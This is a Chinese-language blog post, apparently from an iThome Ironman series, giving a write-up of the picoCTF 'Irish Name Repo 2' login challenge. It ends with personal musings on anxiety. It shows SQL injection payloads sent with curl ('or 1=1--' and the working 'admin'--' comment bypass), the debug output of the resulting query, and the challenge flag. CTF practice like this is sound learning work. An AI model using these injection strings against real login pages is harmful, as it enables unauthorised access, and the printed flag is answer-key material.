今天要解的題目和昨天有關聯
是他進階的2.0
沒錯,又是愛爾蘭人
There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://jupiter.challenges.picoctf.org:64649
Hints
The password is being filtered.
昨天有關於 SQli
今天也繼續往這方面聯想
link 點入後提供了一個登入頁面
<form action="login.php" method="POST">
<fieldset>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" class="form-control">
</div>
<div class="form-group">
<label for="password">Password:</label>
<div class="controls">
<input type="password" id="password" name="password" class="form-control">
</div>
</div>
<input type="hidden" name="debug" value="0">
<div class="form-actions">
<input type="submit" value="Login" class="btn btn-primary">
</div>
</fieldset>
</form>
Oh NO
使用昨天的方式沒效
root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl "https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin&password='+or+1=1--" && echo
<h1>SQLi detected.</h1>
admin'or'1'='1 --
SQli detected
試試看調整 debug 參數
來檢查 SQli改改看把0改成1
root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl
<pre>username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_015815e2}</p>
10/13
我的好朋朋提醒我,昨天這題 key point 沒抓對
不好意思各位,我想挑戰350分的題
解的有困難去看 write up
語意上有些誤會
真對不起大家
這題必須要用 admin 的身分進去,
但是我沒有 admin 的密碼,
所以要把 SQL 查詢密碼的地方註解掉,
帳號輸入admin' -- 就會拿到 flag
我昨天的錯誤在於強調 debug mode 0改成1
這段code昨天沒刪除
他是不需要的扣刪掉
就噴flag ㄌ
"https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin'--&password=1&debug=1" && echo
是錯的喔!!!
為什麼我會想debug改成1試試呢?
debug 改成 1 會出現 debug 的模式,
可以讓你 debug 知道你傳的帳號密碼會進去資料庫的時候
SQL 查詢語句長怎麼樣
附上我參考的 write up
https://0xdiablos.github.io/Irish-Name-Repo/
今天莫名的很迷茫焦躁
情緒在全身流竄
明白快樂是生命中一閃而逝的煙火
你們也為了那點光而努力生活嗎?
否則怎會有那句話
人生不如意十之八九
或許每個人都有陰影吧
如何面對自己的惡夢及缺陷
我也還學不會
我逃避了好多年
希望今年的我夠勇敢
足以面對
iThome鐵人賽
看影片追技術